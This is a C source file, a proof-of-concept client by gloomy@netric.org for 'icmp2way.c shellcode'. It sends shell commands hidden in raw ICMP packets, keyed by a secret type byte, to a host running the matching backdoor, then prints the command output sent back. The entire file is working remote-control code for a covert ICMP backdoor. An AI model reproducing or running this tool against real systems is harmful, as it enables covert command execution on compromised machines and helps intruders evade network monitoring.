/*
-------------------------------------------------------
Simple proof of concept client for icmp2way.c shellcode
by gloomy@netric.org
-------------------------------------------------------
http://www.netric.org/tools/icmp_client.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip_icmp.h>
void usage(char *prog) {
fprintf(stderr,"Usage: %s <secret byte> <hostname> <command>\n",prog);
fprintf(stderr,"Example: %s 0x99 localhost \"/usr/bin/id\"\n\n",prog);
exit(0);
}
void error(char *err) {
perror(err);
exit(-1);
}
int main(int c,char *v[]) {
int fd;
int nb;
int sa_size = sizeof(struct sockaddr);
fd_set rfds;
char secret = 0;
char buf[4096];
char *data = &buf[sizeof(struct icmphdr)+8];
struct timeval tv;
struct sockaddr_in them;
struct icmphdr *hdr = (struct icmphdr *)buf;
struct hostent *host;
if (c != 4) usage(v[0]);
if ((secret = strtoul(v[1],&v[1],16)) == 0) usage(v[0]);
if ((host = gethostbyname(v[2])) == NULL) error("gethostbyname");
if ((fd = socket(AF_INET,SOCK_RAW,1)) < 0) error("socket");
them.sin_family = AF_INET;
them.sin_port = 0;
them.sin_addr = *((struct in_addr *)host->h_addr);
memset(&(them.sin_zero),0,8);
memset(buf,0,sizeof(buf));
hdr->type = secret;
hdr->code = 0;
hdr->checksum = 0xDEAD;
hdr->un.gateway = 0;
strncpy(data,v[3],1024);
if (sendto(fd,buf,sizeof(struct icmphdr)+strlen(data)+8+1,0,(struct sockaddr *)&them,sa_size)<0)
error("sendto");
FD_ZERO(&rfds);
FD_SET(fd,&rfds);
tv.tv_sec = 2;
tv.tv_usec = 0;
while (select(fd+1,&rfds,NULL,NULL,&tv)) {
if ((nb = recvfrom(fd,buf,4096,0,(struct sockaddr *)&them,&sa_size))<0)
error("recvfrom");
buf[nb] = 0;
if (buf[20] == secret+1) {
fprintf(stderr,"%s\n",&buf[21]);
}
}
close(fd);
return 0;
}
|